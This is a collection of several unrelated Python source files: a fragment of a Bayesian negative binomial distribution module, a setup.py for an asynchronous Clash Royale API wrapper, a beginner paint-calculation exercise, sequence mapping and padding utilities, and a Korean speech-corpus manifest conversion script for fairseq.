def expected_log_likelihood(self,x,**kwargs):
r = kwargs['r'] if 'r' in kwargs else self.r
return super(_StartAtRMixin,self).expected_log_likelihood(x-r,**kwargs)
def rvs(self,size=[]):
return super(_StartAtRMixin,self).rvs(size)+self.r
class NegativeBinomialFixedRVariant(_StartAtRMixin,NegativeBinomialFixedR):
    """Fixed-r negative binomial whose support starts at r: the sufficient
    statistics subtract r from every observation before use."""
    def _get_statistics(self,data):
        """(count, sum) on the shifted support: tot -> tot - n*r."""
        count, total = super(NegativeBinomialFixedRVariant,self)._get_statistics(data)
        shifted_total = total - count*self.r
        assert shifted_total >= 0
        return np.array([count, shifted_total])
    def _get_weighted_statistics(self,data,weights):
        """Weighted (count, sum) on the shifted support."""
        count, total = super(NegativeBinomialFixedRVariant,self)._get_weighted_statistics(data,weights)
        shifted_total = total - count*self.r
        assert shifted_total >= 0
        return np.array([count, shifted_total])
class NegativeBinomialIntegerRVariant(NegativeBinomialIntegerR):
    """Integer-r negative binomial whose support starts at r: only r values
    with r <= min(data) are feasible given observed data."""
    def resample(self,data=[]):
        """Gibbs: sample r over the feasible support, then p given r."""
        n, alpha_n, posterior_discrete, r_support = self._posterior_hypparams(
                *self._get_statistics(data)) # NOTE: pass out r_support b/c feasible subset
        self.r = r_support[sample_discrete(posterior_discrete)]
        # alpha_n already includes the unshifted total; subtract n*r to
        # account for the shifted support
        self.p = np.random.beta(alpha_n - n*self.r, self.beta_0 + n*self.r)
    def _get_statistics(self,data):
        """Return (n, sum, per-r base-measure totals, feasibility mask)."""
        n = getdatasize(data)
        if n > 0:
            data = flattendata(data)
            # only r values not exceeding the smallest observation are feasible
            feasible = self.r_support <= data.min()
            assert np.any(feasible)
            r_support = self.r_support[feasible]
            # log base measure of the shifted data, summed over observations
            normalizers = (special.gammaln(data[:,na]) - special.gammaln(data[:,na]-r_support+1)
                    - special.gammaln(r_support)).sum(0)
            return n, data.sum(), normalizers, feasible
        else:
            return n, None, None, None
    def _posterior_hypparams(self,n,tot,normalizers,feasible):
        if n == 0:
            # no data: the posterior over r is just the prior
            return n, self.alpha_0, self.r_probs, self.r_support
        else:
            r_probs = self.r_probs[feasible]
            r_support = self.r_support[feasible]
            # marginal likelihood of each feasible r with p integrated out
            log_marg_likelihoods = special.betaln(self.alpha_0 + tot - n*r_support,
                                        self.beta_0 + r_support*n) \
                                    - special.betaln(self.alpha_0, self.beta_0) \
                                    + normalizers
            log_marg_probs = np.log(r_probs) + log_marg_likelihoods
            log_marg_probs -= log_marg_probs.max()  # max-shift for stability
            marg_probs = np.exp(log_marg_probs)
            return n, self.alpha_0 + tot, marg_probs, r_support
    def _max_likelihood_ps(self,n,tot,rs):
        # MLE of p on the shifted support
        ps = 1-(rs*n)/tot
        assert (ps >= 0).all()
        return ps
    def rvs(self,size=[]):
        """Sample on the shifted support {r, r+1, ...}."""
        return super(NegativeBinomialIntegerRVariant,self).rvs(size) + self.r
class NegativeBinomialIntegerR2Variant(NegativeBinomialIntegerR2):
    """Mean-field variant of NegativeBinomialIntegerR2 whose component
    distributions have support starting at r (data shifted by r).

    NOTE(review): the parent class and _fixedr_distns/_mf_expected_statistics
    contracts are defined outside this chunk — semantics inferred from use.
    """
    # Use the shifted fixed-r component class so rvs/statistics line up.
    _fixedr_class = NegativeBinomialFixedRVariant
    def _update_rho_mf(self,data,weights):
        # Mean-field update of the variational weights over r: start from the
        # prior and add each component's expected log-likelihood terms.
        self.rho_mf = self.rho_0.copy()
        for idx, d in enumerate(self._fixedr_distns):
            n, tot = d._get_weighted_statistics(data,weights)
            Elnp, Eln1mp = d._mf_expected_statistics()
            self.rho_mf[idx] += (d.alpha_0-1+tot)*Elnp + (d.beta_0-1+n*d.r)*Eln1mp
            # NOTE(review): rho_mf_temp is re-copied on every loop iteration,
            # so only the final snapshot differs by the last base-measure
            # term — confirm this is intentional.
            self.rho_mf_temp = self.rho_mf.copy()

            # NOTE: this method only needs to override parent in the base measure
            # part, i.e. data -> data-r
            if isinstance(data,np.ndarray):
                self.rho_mf[idx] += weights.dot(d._log_base_measure(data-d.r,d.r))
            else:
                self.rho_mf[idx] += sum(w.dot(d._log_base_measure(dt-d.r,d.r))
                        for dt,w in zip(data,weights))
| nilq/baby-python | python |
from setuptools import find_packages, setup

# Read the README so PyPI can render it as the project's long description.
with open("README.md", "r", encoding="utf-8") as fh:
    long_description = fh.read()

# Packaging metadata for py-royale, an asyncio wrapper around the official
# Supercell Clash Royale API (hence the aiohttp runtime dependency).
setup(
    name="py-royale",
    version="0.1.0",
    author="Kenan Džindo",
    description="Asynchronous wrapper for the official Supercell Clash Royale API.",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/dzindo/PyRoyale",
    project_urls={"Bug Tracker": "https://github.com/dzindo/PyRoyale/issues"},
    install_requires=["aiohttp>=3.7.4"],
    keywords=["supercell", "api", "asynchronous", "clash royale", "api wrapper", "asyncio", "aiohttp"],
    license="MIT",
    classifiers=[
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.7",
        "Programming Language :: Python :: 3.8",
        "License :: OSI Approved :: MIT License",
        "Operating System :: Unix",
        "Operating System :: MacOS :: MacOS X",
        "Operating System :: Microsoft :: Windows",
    ],
    packages=find_packages(),
    python_requires=">=3.7.0",
)
| nilq/baby-python | python |
# Desafio 011: read a wall's width and height, compute its area and the
# litres of paint needed (one litre covers 2 m²). All user-facing text is
# kept in the original Portuguese.
print('=== DESAFIO 011 ===')
print('Faça um programa que leia a largura e a altura de uma parede em metros, calcule a sua área \ne a quantidade de tinta necessária para pintá-la, sabendo que cada litro de tinta pinta uma área de 2m²:')

# Wall dimensions in metres, read from the user.
largura = float(input('Digite a largura da parede: '))
altura = float(input('Digite a altura da parede: '))

# One litre of paint covers 2 square metres.
area = largura * altura
litros = area / 2
print(f'Sua parede tem a dimensão de {largura}m x {altura}m e sua área é de {area}m². Para pintá-la, você irá precisar de {litros:.2f} litros de tinta.')
| nilq/baby-python | python |
from pad import pad1d, pad2d
def map_sequence(seq, sequence_map, unk_item_id):
    """Transform a split sequence of items into another sequence of items
    according to the rules encoded in the dict ``sequence_map``.

    Items not present in the map are replaced by ``unk_item_id``.

    seq: iterable of hashable items
    sequence_map: dict mapping item -> mapped value (e.g. word -> id)
    unk_item_id: fallback value for unknown items
    """
    # dict.get with a default replaces the manual lookup-and-append loop.
    return [sequence_map.get(item, unk_item_id) for item in seq]
def map_sequences(sequences, sequence_map, unk_item_id):
    """Transform a list of sequences into another one, according to
    the rules encoded in ``sequence_map``.

    sequences: iterable of item sequences
    sequence_map: dict mapping item -> mapped value
    unk_item_id: fallback value for unknown items
    """
    # Comprehension instead of the manual append loop (pure construction).
    return [map_sequence(seq, sequence_map, unk_item_id) for seq in sequences]
def split_map_sequence(seq, sequence_map, unk_item_id, seq_splitter):
    """Split a raw sequence and transform the resulting items according to
    the rules encoded in ``sequence_map``.

    Example usage: mapping a sentence string into word ids.

    seq: raw sequence (e.g. a string)
    sequence_map: dict mapping item -> mapped value
    unk_item_id: fallback value for unknown items
    seq_splitter: callable that splits ``seq`` into items
    """
    tokens = seq_splitter(seq)
    return map_sequence(tokens, sequence_map, unk_item_id)
def split_map_sequences(sequences, sequence_map, unk_item_id, seq_splitter):
    """Split each sequence in the batch and transform the items into the
    values specified by ``sequence_map`` (unknown items -> unk_item_id)."""
    tokenized = [seq_splitter(raw) for raw in sequences]
    return map_sequences(tokenized, sequence_map, unk_item_id)
def split_map_pad_sequences(sequences, sequence_map, unk_item_id, pad_id,
                            seq_splitter):
    """Split, transform (map) and pad a batch of sequences.

    Returns the padded and mapped sequences, the original lengths, and a
    mask marking real item positions (as opposed to padding), exactly as
    produced by ``pad1d``.
    """
    mapped = split_map_sequences(sequences, sequence_map, unk_item_id,
                                 seq_splitter)
    # pad1d returns (padded_sequences, lengths, mask).
    return pad1d(mapped, pad_id)
def split_sequences2d(sequences, seq_splitter_d1, seq_splitter_d2):
    """Split each sequence into its second-level hierarchy components,
    e.g. split strings into words and those words into characters.

    [
     'a brown cat',
    ]
    becomes
    [
     [['a'], ['b', 'r', 'o', 'w', 'n'], ['c', 'a', 't']],
    ]

    sequences: iterable of raw sequences
    seq_splitter_d1: splits a sequence into first-level items (e.g. words)
    seq_splitter_d2: splits a first-level item into second-level items
        (e.g. characters)

    Returns a doubly nested list.
    """
    # Nested comprehension replaces the two-stage append loops.
    return [[seq_splitter_d2(item) for item in seq_splitter_d1(seq)]
            for seq in sequences]
def split_map_sequences2d(sequences, sequence_map_d2, unk_item_id_d2,
                          seq_splitter_d1, seq_splitter_d2):
    """Split and transform (map) a batch of sequences at the second
    hierarchy level, e.g. convert a batch of strings into
    character-level-encoded sequences (words are the 1st hierarchy level,
    characters the 2nd one).

    [
     'a cat',
    ]
    becomes (with a char -> id map)
    [
     [[0], [2, 0, 19]],
    ]

    Unknown second-level items are mapped to ``unk_item_id_d2``.
    Returns a doubly nested list of mapped ids.
    """
    nested = split_sequences2d(sequences, seq_splitter_d1, seq_splitter_d2)
    return [map_sequences(first_level, sequence_map_d2, unk_item_id_d2)
            for first_level in nested]
def split_map_pad_sequences2d(sequences, sequence_map_d2, unk_item_id_d2,
                              pad_id_d2, seq_splitter_d1, seq_splitter_d2):
    """Split, map and pad a batch of sequences at the second hierarchy
    level; returns (padded_batch, first_h_lengths, second_h_lengths, masks)
    exactly as produced by ``pad2d``."""
    nested_ids = split_map_sequences2d(
        sequences, sequence_map_d2, unk_item_id_d2,
        seq_splitter_d1, seq_splitter_d2)
    return pad2d(nested_ids, pad_id_d2)
if __name__ == '__main__':
    # Demo / smoke test of the splitting, mapping and padding helpers.
    # 1-D word-level mapping:
    seq = 'a cat sat on the red mat'
    splitted_seq = ['a', 'cat', 'sat', 'on', 'the', 'mat']
    sequence_map = {'cat': 1, 'mat': 2, 'a': 3, 'sat': 4, 'the': 5, 'on': 6,
                    'feel': 7, 'feels': 8, 'saw': 9}
    print(split_map_sequence(seq, sequence_map, 0, lambda x: x.split(' ')))
    print(map_sequence(splitted_seq, sequence_map, 0))
    print('Sequence map:\n', sequence_map)
    str_sequences = ['a brown cat sat on the red mat',
                     'a gray fox jumped over the dog',
                     'Phil saw Feel feel the feels']
    print('Sequences:\n', str_sequences)
    id_sequences = split_map_sequences(str_sequences, sequence_map, 0,
                                       lambda x: x.split(' '))
    print('Splitted and transformed sequences:\n',
          id_sequences)
    print('\n' + 72 * '#' + '\n')
    # 1-D padding (right-aligned and left-aligned):
    sequences = [[2, 45, 3, 23, 54], [12, 4, 2, 2], [4], [45, 12]]
    padded_sequences, lengths, mask = pad1d(sequences, 0)
    print('Original sequences:\n\t', sequences)
    print('Padded sequences:\n', padded_sequences)
    print('Lengths:\n', lengths)
    print('Mask:\n', mask)
    left_padded_sequences, lengths, left_padded_mask = \
        pad1d(sequences, 0, align_right=True)
    print('Left padded sequences:\n', left_padded_sequences)
    print('Left padded mask:\n', left_padded_mask)
    print('\n' + 72 * '#' + '\n')
    # 2-D (word x character) padding:
    char_encoded_sent = [[[1, 2, 3], [4, 5, 6, 1], [10, 23], [3, 5, 2, 1, 76]],
                         [[7, 8, 9, 10, 11], [1, 2, 5, 3, 6, 10, 12]]]
    padded_batch, sentence_lengths, word_lengths, masks = \
        pad2d(char_encoded_sent, 0)
    print('Char-encoded sent:\n\t', char_encoded_sent)
    print('padded char-encoded sent:\n', padded_batch)
    print('sentence lengths:\n', sentence_lengths)
    print('word lengths tensor:\n', word_lengths)
    print('masks:\n', masks)
    print('\n' + 72 * '#' + '\n')
    # End-to-end: strings -> padded id batch.
    print('Transform a batch of sentences into a padded batch of ids\n')
    print('Sequences:\n', str_sequences)
    padded_sequences, lengths, mask = split_map_pad_sequences(
        str_sequences, sequence_map, 0, 0, lambda x: x.split(' '))
    print('Padded sequences:\n', padded_sequences)
    print('Lengths:\n', lengths)
    print('Mask:\n', mask)
    # Character-level (2nd hierarchy) pipeline; 99 = unknown char, 33 = pad.
    alphabet = 'abcdefghijklmnopqrstuvwxyz'
    sequence_map_d2 = {char: idx for idx, char in enumerate(alphabet)}
    splitted_seqs_d2 = split_sequences2d(str_sequences,
                                         lambda x: x.split(' '),
                                         lambda x: [y for y in x])
    print(splitted_seqs_d2)
    splitted_mapped_seqs_d2 = \
        split_map_sequences2d(str_sequences, sequence_map_d2, 99,
                              lambda x: x.split(' '),
                              lambda x: [y for y in x])
    print(splitted_mapped_seqs_d2)
    splitted_mapped_padded_seqs_d2 = \
        split_map_pad_sequences2d(
            str_sequences, sequence_map_d2, 99,
            33,
            lambda x: x.split(' '),
            lambda x: [y for y in x])
    print(splitted_mapped_padded_seqs_d2)
| nilq/baby-python | python |
import argparse
from preprocess import preprocess
import os
from pathlib import Path
import wave
import numpy as np
import unicodedata
import random
from tqdm import tqdm
import re
import yaml
import sys
import librosa
## Convert KsponSpeech data into Fairseq-style manifest files
def get_parser():
    """Build the CLI argument parser for the KsponSpeech -> fairseq
    manifest conversion script.

    Korean help strings and author-local default paths are preserved
    verbatim (they are user-facing runtime text).
    """
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "--root", default='/code/gitRepo/data/aihub/ksponspeech', metavar="DIR",
        help="root directory containing flac files to index"
    )
    # Directory of extra per-utterance transcript corrections (YAML files).
    parser.add_argument(
        "--info", default=None, metavar="DIR",
        help="전처리 추가적으로 수행한 것."
    )
    parser.add_argument(
        "--do_info", action="store_true",
        help="전처리 추가적으로 수행할지 여부 확인"
    )
    # Whether to drop sentences still containing digits / Latin letters.
    parser.add_argument(
        "--do_remove", action="store_true",
        help="한글 음소가 아닌 숫자, 영어가 포함되어 있는 모든 단어를 삭제할지 여부 확인"
    )
    # Maximum sentence length in characters.
    parser.add_argument(
        "--token_limit", default=sys.maxsize, type=int,
        help="최대 글자수 체크"
    )
    parser.add_argument(
        "--dest", default='manifest_temp', type=str, metavar="DIR", help="output directory"
    )
    parser.add_argument(
        "--ext", default="pcm", type=str, metavar="EXT", help="extension to look for"
    )
    parser.add_argument('--preprocess_mode', type=str,
                        default='phonetic',
                        help='Ex) (70%)/(칠 십 퍼센트) 확률이라니 (뭐 뭔)/(모 몬) 소리야 진짜 (100%)/(백 프로)가 왜 안돼?'
                             'phonetic: 칠 십 퍼센트 확률이라니 모 몬 소리야 진짜 백 프로가 왜 안돼?'
                             'spelling: 70% 확률이라니 뭐 뭔 소리야 진짜 100%가 왜 안돼?')
    parser.add_argument('--output_unit', type=str,
                        default='grapheme',
                        help='character or subword or grapheme')
    parser.add_argument('--additional_output_unit', type=str,
                        default=None,
                        help='character or subword or grapheme')
    parser.add_argument("--seed", default=42, type=int, metavar="N", help="random seed")
    # Optional duration-limited training subset: 10min/1hour/10hour/100hour.
    parser.add_argument(
        "--time",
        default=None,
        type=str,
        metavar="MIN",
        help="set if you want make split manifest",
    )
    parser.add_argument('--script_path', type=str,
                        default="/code/gitRepo/data/aihub/ksponspeech/KsponSpeech_scripts",
                        help='AIHUB에서 제공해 주는 스크립트 폴더')
    # Trim non-speech regions (librosa) before measuring durations.
    parser.add_argument(
        "--del_silence", action="store_true",
        help="음성이 없는 곳을 삭제하는 건 어때?"
    )
    return parser
def find_index(durations, limit):
    """Return the first index ``idx`` such that the sum of
    ``durations[:idx]`` exceeds ``limit``; return ``len(durations)`` when
    the limit is never exceeded.

    Used to cut a shuffled training list at a total-duration budget.

    durations: sequence of per-utterance frame counts
    limit: total frame budget
    """
    # Keep a running prefix sum instead of recomputing sum(durations[:idx])
    # on every iteration (the original was accidentally O(n^2)).
    total = 0
    for idx in range(len(durations)):
        if total > limit:
            return idx
        total += durations[idx]
    return len(durations)
def set_seed(seed):
    """Seed both the stdlib and the NumPy RNGs so shuffles and random
    draws are reproducible across runs."""
    for seeder in (random.seed, np.random.seed):
        seeder(seed)
def load_yaml(yaml_path):
    """Parse a single YAML file and return its contents (typically a dict
    of audio_num -> corrected transcript)."""
    with open(yaml_path, 'r') as stream:
        return yaml.load(stream, Loader=yaml.FullLoader)
def load_info(info_path):
    """Merge every ``*.yaml`` file found directly under ``info_path`` into
    a single dict (later files overwrite earlier keys). Returns an empty
    dict when the directory does not exist."""
    if not os.path.isdir(info_path):
        return {}
    merged = {}
    # Same membership test as before: any filename containing '.yaml'.
    for filename in os.listdir(info_path):
        if '.yaml' not in filename:
            continue
        merged.update(load_yaml(os.path.join(info_path, filename)))
    return merged
def save_converted_info(args, name, converted_info):
    """Dump the map of converted transcripts to ``<dest>/<name>.yaml``,
    sorted by (key length, key). No file is written when the map is empty."""
    if not converted_info:
        return
    ordered = {k: v for k, v in sorted(converted_info.items(),
                                       key=lambda item: (len(item[0]), item[0]))}
    with open(os.path.join(args.dest, '{}.yaml'.format(name)), 'w', encoding="utf-8") as write_f:
        yaml.dump(ordered, write_f, allow_unicode=True, default_style=None, default_flow_style=False)
def save_wrong_script(args, name, transcripts, fileinfo, raw_sentences, new_sentences):
    """Collect utterances whose grapheme transcript still contains digits
    or Latin capital letters (i.e. untranslated tokens) and dump their raw
    sentences to ``<dest>/<name>.yaml`` keyed by the 6-digit audio number."""
    ## A capital Latin letter at the start of a grapheme flags a bad token.
    reg = re.compile(r'[A-Z]')
    wrong = {}
    for grapheme_transcript, fileitem, raw_sentence, new_sentence in zip(
            transcripts, fileinfo, raw_sentences, new_sentences):
        file_num = Path(fileitem.split()[0]).stem.split("_")[1]
        assert len(file_num) == 6
        if any(g.isdigit() or reg.match(g) for g in grapheme_transcript.split()):
            wrong[file_num] = str(raw_sentence.replace('\n', ''))
    if len(wrong) == 0:
        return
    ## Sort by (key length, key) for a stable, readable dump.
    wrong = {k: v for k, v in sorted(wrong.items(),
                                     key=lambda item: (len(item[0]), item[0]))}
    with open(os.path.join(args.dest, '{}.yaml'.format(name)), 'w', encoding="utf-8") as write_f:
        yaml.dump(wrong, write_f, allow_unicode=True, default_style=None, default_flow_style=False)
def save_dict(args, transcripts, dict_name='dict.ltr.txt', alphabet_name='alphabet.txt'):
    """Write a fairseq-style grapheme dictionary and an alphabet file.

    args: namespace with ``.dest`` output directory
    transcripts: iterable of space-separated grapheme strings
    dict_name: output file of "<grapheme> <count>" lines, most frequent first
    alphabet_name: DeepSpeech-style alphabet file (one grapheme per line)
    """
    # Count with a dict: O(1) per grapheme instead of the original
    # list.index scan, which made counting O(n^2).
    counts = {}
    for grapheme_transcript in transcripts:
        for grapheme in grapheme_transcript.split():
            counts[grapheme] = counts.get(grapheme, 0) + 1

    # Sort by (frequency, grapheme) descending — same order the original
    # zip/sort produced. Unlike the original, empty input no longer crashes
    # (zip(*[]) raised ValueError); it now writes empty/header-only files.
    ranked = sorted(counts.items(), key=lambda kv: (kv[1], kv[0]), reverse=True)

    ## write ltr dictionary
    with open(os.path.join(args.dest, dict_name), 'w') as write_f:
        for grpm, freq in ranked:
            print("{} {}".format(grpm, freq), file=write_f)

    ## Write Vocab files
    with open(os.path.join(args.dest, alphabet_name), 'w', encoding='UTF8') as write_f:
        print("# Each line in this file represents the Unicode codepoint (UTF-8 encoded)", file=write_f)
        print("# associated with a numeric label.", file=write_f)
        print("# A line that starts with # is a comment. You can escape it with \# if you wish", file=write_f)
        print("# to use '#' as a label.", file=write_f)
        for grpm, _freq in ranked:
            print(grpm, file=write_f)
        ## final token must be \n
        print('', file=write_f)
        print("# The last (non-comment) line needs to end with a newline.", file=write_f, end='')
    return
def save_lexicon(args, texts, lexicon_name='lexicon.lst'):
    """Write a word lexicon to ``<dest>/<lexicon_name>``: one line per
    unique word, "<word>\\t<g r a p h e m e s> |", sorted by word."""
    spelled = {}
    for sentence in texts:
        for word in sentence.split():
            # Spell the word out grapheme by grapheme with a trailing "|"
            # word boundary marker, e.g. "cat" -> "c a t |".
            spelled[word] = " ".join(word + "|")
    with open(os.path.join(args.dest, lexicon_name), 'w', encoding='UTF8') as write_f:
        for word in sorted(spelled):
            print("{}\t{}".format(word, spelled[word]), file=write_f)
    return
def save_files(args, file_name, dir_path, fileinfo, texts, transcripts):
    """Write the fairseq manifest triple for one split:
    ``<dest>/<file_name>.tsv`` (audio root + per-file "path\\tframes"),
    ``.wrd`` (word-level text) and ``.ltr`` (grapheme transcript + " |")."""
    base = os.path.join(args.dest, file_name)
    with open(base + ".tsv", 'w') as tsv_out, \
            open(base + ".ltr", "w") as ltr_out, \
            open(base + ".wrd", "w") as wrd_out:
        # First tsv line is the audio root directory.
        print(dir_path, file=tsv_out)
        # zip keeps the three manifests aligned row by row.
        for tsv_item, wrd_item, ltr_item in zip(fileinfo, texts, transcripts):
            print(tsv_item, file=tsv_out)
            print(wrd_item, file=wrd_out)
            print(ltr_item + " |", file=ltr_out)
    print("save files [{}]".format(file_name))
    return
def pcm2wav(pcm_file, channels=1, bit_depth=16, sampling_rate=16000):
    """Wrap a headerless ``.pcm`` file into a ``.wav`` container written
    next to it (same stem, ``.wav`` suffix).

    Returns the path of the written wav file.
    Raises ValueError when ``bit_depth`` is not a multiple of 8.
    """
    if bit_depth % 8 != 0:
        raise ValueError("bit_depth " + str(bit_depth) + " must be a multiple of 8.")
    wav_file = str(Path(pcm_file).with_suffix('.wav'))
    # Raw PCM has no header: the sample bytes are copied verbatim into the
    # wav container, whose header encodes channels/width/rate.
    with open(pcm_file, 'rb') as src:
        raw_samples = src.read()
    with wave.open(wav_file, 'wb') as dst:
        dst.setnchannels(channels)
        dst.setsampwidth(bit_depth // 8)
        dst.setframerate(sampling_rate)
        dst.writeframes(raw_samples)
    return wav_file
def load_script(args, script_path, info_data, token_limit=sys.maxsize):
    """Read one AIHub ``.trn`` script file and build manifest data.

    Each script line has the form ``<relative audio path> :: <sentence>``.
    For every usable utterance this measures the audio length in frames,
    preprocesses the sentence and encodes it in the configured output
    unit(s). Utterances longer than ``token_limit`` characters, or (with
    ``--do_remove``) still containing digits/Latin letters, are skipped.

    Returns a 10-tuple: (fileinfo, durations, texts, audio_nums,
    transcripts, raw_sentences, new_sentences, converted_info,
    additional_texts, additional_transcripts).
    """
    assert os.path.isfile(script_path)
    fileinfo = list()
    durations = list()
    texts = list()
    audio_nums = list()
    transcripts = list()
    additional_texts = list()
    additional_transcripts = list()
    raw_sentences = list()
    new_sentences = list()
    converted_info = {}
    # Matches any sentence that still contains a Latin letter or digit.
    reg = re.compile(r'.*[a-zA-Z0-9]')
    limit_count = 0
    remove_count = 0
    with open(script_path, "r") as f:
        for line in tqdm(f):
            convert_flag = False
            items = line.split(" :: ")
            file_path = os.path.join(args.root, items[0])
            file_path = os.path.realpath(file_path)
            # 6-digit utterance id taken from the filename stem.
            audio_num = str(Path(file_path).stem.split("_")[1])
            raw_sentence = items[1]
            # Prefer the manually corrected transcript when one exists.
            if len(audio_num) ==6 and audio_num in info_data:
                raw_sentence = info_data[audio_num]
                convert_flag=True
            ## check the audio file extension and load the waveform
            if args.ext == 'pcm':
                try:
                    # Raw 16-bit PCM mapped straight from disk, scaled to [-1, 1].
                    wav = np.memmap(file_path, dtype='h', mode='r').astype('float32') / 32767
                    sr = 16000
                except ValueError:
                    # pcm load failed: convert the file to wav and load that instead
                    file_path = pcm2wav(file_path)
                    wav, sr = librosa.load(file_path, sr=16000)
            elif args.ext in ['flac', 'wav']:
                wav, sr = librosa.load(file_path, sr=16000)
            else:
                raise ValueError("Unsupported extention method : {0}".format(args.ext))
            # Optionally cut silent regions so durations reflect speech only.
            if args.del_silence:
                non_silence_indices = librosa.effects.split(wav, top_db=30)
                wav = np.concatenate([wav[start:end] for start, end in non_silence_indices])
            frames = len(wav)
            # KsponSpeech utterances (6-digit id) go through the project's
            # transcript preprocessing; anything else is used as-is.
            if len(audio_num) ==6:
                new_sentence = preprocess(raw_sentence=raw_sentence, mode=args.preprocess_mode, audio_num=audio_num)
            else:
                new_sentence = raw_sentence.replace('\n', '')
            ################################## filtering
            if len(new_sentence) > token_limit:
                limit_count+=1
                continue
            # Drop (but record) sentences that still contain digits/Latin
            # letters unless we are in 'spelling' mode.
            if args.do_remove and reg.match(new_sentence) and args.preprocess_mode != 'spelling':
                converted_info[audio_num] = new_sentence
                remove_count += 1
                continue
            #################################
            ## add new output units here.
            if args.output_unit == 'grapheme':
                # NFKD decomposes Hangul syllables into jamo graphemes;
                # spaces become the "|" word-boundary token.
                texts.append(unicodedata.normalize('NFKD', new_sentence).upper())
                transcripts.append(" ".join(unicodedata.normalize('NFKD', new_sentence).replace(' ', '|')).upper())
            elif args.output_unit == 'character':
                texts.append(new_sentence.upper())
                transcripts.append(" ".join(list(new_sentence.replace(' ', '|').upper())))
            else:
                raise ValueError("Unsupported preprocess method : {0}".format(args.output_unit))
            ## add new output units here (secondary encoding, optional).
            if args.additional_output_unit is not None:
                if args.additional_output_unit == 'grapheme':
                    additional_texts.append(unicodedata.normalize('NFKD', new_sentence).upper())
                    additional_transcripts.append(" ".join(unicodedata.normalize('NFKD', new_sentence).replace(' ', '|')).upper())
                elif args.additional_output_unit == 'character':
                    additional_texts.append(new_sentence.upper())
                    additional_transcripts.append(" ".join(list(new_sentence.replace(' ', '|').upper())))
                else:
                    raise ValueError("Unsupported preprocess method : {0}".format(args.output_unit))
            # Remember which utterances used a corrected transcript.
            if convert_flag:
                converted_info[audio_num] = new_sentence
            ## append the bookkeeping info for this utterance
            fileinfo.append("{}\t{}".format(os.path.relpath(file_path, args.root), frames))
            durations.append(frames)
            audio_nums.append(audio_num)
            raw_sentences.append(raw_sentence)
            new_sentences.append(new_sentence)
    # Summary counters (Korean user-facing messages kept verbatim).
    print("총 무시된 숫자 : ", limit_count+remove_count)
    print("길이를 넘겨서 무시된 숫자 : ", limit_count)
    print("숫자등이 있어서 무시된 숫자 : ", remove_count)
    return fileinfo, durations, texts, audio_nums, transcripts, raw_sentences, new_sentences, converted_info, additional_texts, additional_transcripts
def main(args):
    """Drive the KsponSpeech -> fairseq manifest conversion.

    Processes the four AIHub script files (train/dev/eval_other/eval_clean)
    that exist under ``args.script_path``: loads each, writes manifest
    triples, and for the training split additionally writes the lexicon,
    dictionary and alphabet, optionally subsampling by total duration.
    """
    if not os.path.exists(args.dest):
        os.makedirs(args.dest)
    args.root = os.path.realpath(args.root)
    ## folders expected under --root (sanity check currently disabled)
    #for folder in ['KsponSpeech_01','KsponSpeech_02','KsponSpeech_03','KsponSpeech_04','KsponSpeech_05','KsponSpeech_eval']:
    #    if folder not in os.listdir(args.root):
    #        assert os.path.isdir(folder), "root 위치에 해당 폴더가 반드시 필요합니다. [{}]".format(folder)
    assert os.path.isdir(args.script_path), "aihub에서 제공해주는 스크립트 폴더를 넣어주시기 바랍니다. script_path : [{}]".format(args.script_path)
    ## load the extra transcript-correction info
    info_data = {}
    if args.do_info:
        ## read the YAML correction files
        info_data = load_info(args.info)
    ## only consider files with the .trn extension
    file_list = [file for file in os.listdir(args.script_path) if Path(file).suffix == '.trn']
    assert len(file_list) > 0, "스크립트 파일이 한개도 없네요 [{}]".format(args.script_path)
    ## read the train script.
    script_name = 'train.trn'
    if script_name in file_list:
        print("generate [{}]".format(script_name))
        fileinfo, durations, texts, audio_nums, transcripts, raw_sentences, new_sentences, converted_info, additional_texts, additional_transcripts = load_script(args, os.path.join(args.script_path, script_name), info_data, token_limit=args.token_limit)
        # np arrays allow fancy indexing with the shuffled train_ids below.
        fileinfo = np.array(fileinfo)
        durations = np.array(durations)
        texts = np.array(texts)
        transcripts = np.array(transcripts)
        ## additional output unit
        additional_texts = np.array(additional_texts)
        additional_transcripts = np.array(additional_transcripts)
        ## build the lexicon
        save_lexicon(args, texts, lexicon_name='lexicon.lst')
        ## save the dictionary
        save_dict(args, transcripts, dict_name='dict.ltr.txt', alphabet_name='alphabet.txt')
        ## also emit the additional-unit variant
        if args.additional_output_unit is not None:
            ## build the lexicon
            save_lexicon(args, additional_texts, lexicon_name='add_lexicon.lst')
            ## save the dictionary
            save_dict(args, additional_transcripts, dict_name='add_dict.ltr.txt', alphabet_name='add_alphabet.txt')
        #save_wrong_script(args, 'train_wrong',transcripts, fileinfo, raw_sentences, new_sentences)
        save_converted_info(args, 'train_converted', converted_info)
        ## optionally subsample the training set by total audio duration
        train_ids = [idx for idx, num in enumerate(audio_nums)]
        limit_idx = len(train_ids)
        if args.time is not None:
            random.shuffle(train_ids)
            assert args.time in ['10min', '1hour', '10hour', '100hour'], '설정 재대로 해라...'
            time_limit = 0
            if args.time == '10min':
                ## 16000 Hz * 60 s * 10 min
                time_limit = 16000 * 60 * 10
            if args.time == '1hour':
                ## 16000 Hz * 60 s * 60 min * 1
                time_limit = 16000 * 60 * 60 * 1
            if args.time == '10hour':
                ## 16000 Hz * 60 s * 60 min * 10
                time_limit = 16000 * 60 * 60 * 10
            if args.time == '100hour':
                ## 16000 Hz * 60 s * 60 min * 100
                time_limit = 16000 * 60 * 60 * 100
            limit_idx = find_index(durations[train_ids], time_limit)
        save_files(args, 'train', args.root, fileinfo[train_ids[:limit_idx]], texts[train_ids[:limit_idx]],
                   transcripts[train_ids[:limit_idx]])
        ## also emit the additional-unit variant
        if args.additional_output_unit is not None:
            save_files(args, 'add_train', args.root, fileinfo[train_ids[:limit_idx]], additional_texts[train_ids[:limit_idx]],
                       additional_transcripts[train_ids[:limit_idx]])
    ## read the dev script.
    script_name = 'dev.trn'
    if script_name in file_list:
        print("generate [{}]".format(script_name))
        fileinfo, durations, texts, audio_nums, transcripts, raw_sentences, new_sentences, converted_info, additional_texts, additional_transcripts = load_script(args, os.path.join(args.script_path, script_name), info_data)
        save_files(args, 'dev', args.root, fileinfo, texts, transcripts)
        ## also emit the additional-unit variant
        if args.additional_output_unit is not None:
            save_files(args, 'add_dev', args.root, fileinfo, additional_texts, additional_transcripts)
        #save_wrong_script(args, 'dev_wrong', transcripts, fileinfo, raw_sentences, new_sentences)
